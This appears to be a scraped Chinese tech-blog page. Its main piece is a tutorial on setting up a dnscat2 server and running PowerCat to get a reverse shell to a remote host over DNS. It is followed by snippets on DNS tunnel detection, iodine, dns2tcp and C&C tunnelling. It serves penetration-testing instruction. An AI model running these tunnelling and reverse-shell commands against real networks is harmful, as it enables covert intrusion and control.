PowerCat DNS 隧道通信

powercat 也是一套基于 DNS 通信协议的工具。Powercat的dns的通信是基于dnscat设计的(其服务端就是dnscat)。在使用dnscat时需要进行下载和编译。

dnscat服务端安装:

#git clone https://github.com/iagox86/dnscat2.git

#cd dnscat2/server

#sudo gem install bundler

#sudo bundle install

#sudo ruby ./dnscat2.rb

参考链接:https://www.cnblogs.com/KevinGeorge/p/9100028.html

然后在安装了dnscat的linux主机上执行如下命令

ruby dnscat2.rb ttpowercat.test -e open --no-cache

执行以上命令后,返回windows主机,执行如下命令:

powercat -c 192.168.190.112 -p 53 -dns ttpowercat.test -e cmd.exe

可以看到dnscat上的已经接收到反弹shell了(-dns参数表示使用dns通信)

dnscat 常用命令如下:

原文地址:https://www.cnblogs.com/micr067/p/12251269.html

时间: 2024-10-10 09:07:36

PowerCat DNS 隧道通信的相关文章

DNS隧道通信的检测

DNS隧道通信的检测 DNS 隧道通信 DNS 隧道通信是C&C常用的通信方式,一般常用的编码方式Base64,Binary编码,Hex编码等.且请求的Type一般都是txt(为了返回的时候能够加入更多的信息).payload部分一般是子域名.攻击者自己控一个域的DNS权威应答服务器,然后等待失陷主机请求域名,本地DNS服务器迭代查询转发请求到那台权威DNS,从而实现失陷主机与C&C Server的通信. DNS 检测方案 + 频率大:一般远超正常的DNS频率: + 不重复:一般子域名变化

DNS隧道工具iodine

DNS隧道工具iodine 在受限制的网络中,如果DNS请求没有被限制,就可以通过DNS请求建立隧道而突破网络限制.iodine是Kali Linux提供的一款DNS隧道工具.该工具分为服务器端iodined和客户端iodine.服务器端iodined提供特定域名的DNS解析服务.当客户端请求该域名的解析,就可以建立隧道连接.该工具不仅可以提供高性能的网络隧道,还能提供额外的安全保证.渗透测试人员可以设置服务的访问密码,来保证该服务不被滥用.

基于常规DNS隧道进行的tcp端口转发dns2tcp的使用

0x01 安装Dns2TCP dns2tcp 是一个利用DNS隧道转发TCP连接的工具,使用C语言开发. sudo apt-get install dns2tcp 0x02配置dns2tcp 配置DNS2TCP服务端 首先,将你的某个域名(这里以creke.net为例)开个二级域名a.creke.net,类型为NS,NS记录指向b.creke.net.然后将b.creke.net建立A记录指向你的Linux服务器IP(这里以1.2.3.4为例).如下表所示. a.creke.net NS b.c

DNS隧道--dnscat2

安装 服务端 git clone https://github.com/iagox86/dnscat2.git cd dnscat2 cd server sudo gem install bundler bundle install 客户端 git clone https://github.com/iagox86/dnscat2.git cd dnscat2/client/ make *** 服务端和客户端均有编译好的 *** 运行 直连 服务端 ruby ./dnscat2.rb --dns

使用隧道技术进行C&C通信

一.C&C通信 这里的C&C服务器指的是Command & Control Server--命令和控制服务器,说白了就是被控主机的遥控端.一般C&C节点分为两种,C&C Server 和 C&C Client.Server就是就是黑客手里的遥控器.Client就是被控制的电脑,也就是受害者.C&C通信就是Client和Server之间的通信.再说具体一点,就是Client上被植入的木马或者后门程序与Server上的远控程序之间的通信. 二.普通C&a

通过ssh建立点对点的隧道,实现两个子网通信

查看ssh帮助文档是发现有个-w的参数,说明如下: -w local_tun[:remote_tun] Requests tunnel device forwarding with the specified tun(4) devices between the client (local_tun) and the server (remote_tun). The devices may be specified by numerical ID or the keyword "any"

《TCP/IP详解卷1:协议》第14章 DNS:域名系统---读书笔记

<TCP/IP详解卷1:协议>第14章 DNS:域名系统---读书笔记 1.引言 5.指针查询 DNS中一直难于理解的部分就是指针查询方式,即给定一个IP地址,返回与该地址对应的域名. 当一个组织加入Internet,并获得DNS域名空间的授权,如noao.edu,则它们也获得了对应IP地址的in-addr.arpa域名空间的授权.在noao.edu这个例子中,它的网络号是140.252的B类网络.在DNS树中结点in-addr.arpa的下一级必须是该IP地址的第一字节(例中为140),再下

【详解】DNS服务工作原理、正反向解析和主从同步

目录: 一.理论部分 二.实验部分 ******************************理论部分*************************************** 正文: 一.什么是DNS服务. DNS服务是互联网的基础性服务之一.全称为Domain Name System(域名系统).DNS是因特网上作为域名和IP地址相互映射的一个分布式数据库,提供将域名转换成对应IP地址的信息条目,能够使用户更方便的通过域名(如baidu.com)去访问互联网,而不用去记住能够被机器直接

从根开始的DNS服务器架构,让整个互联网掌控于你的手中

做为想完全掌握DNS服务的同学来说,就很有必要去理解一下,到底我们做为客户机在上网时把DNS地址指向电信提供的DNS服务器后,我们在浏览器上输入一个域名的同时,这些DNS服务器是如何帮我们解析出对应的IP地址的.那么今天就给大家揭密一下,如何从根开始搭建一个完整的互联网体系下的DNS服务器架构,从此,让整体互联网从你开始,让整个互联网掌控于你的手中. 环境需求: 1.5台DNS服务器 2.操作系统版本:Centos7.2 3.DNS解析器(bind)版本:9.9.4 架构部署如图所示 .服务器: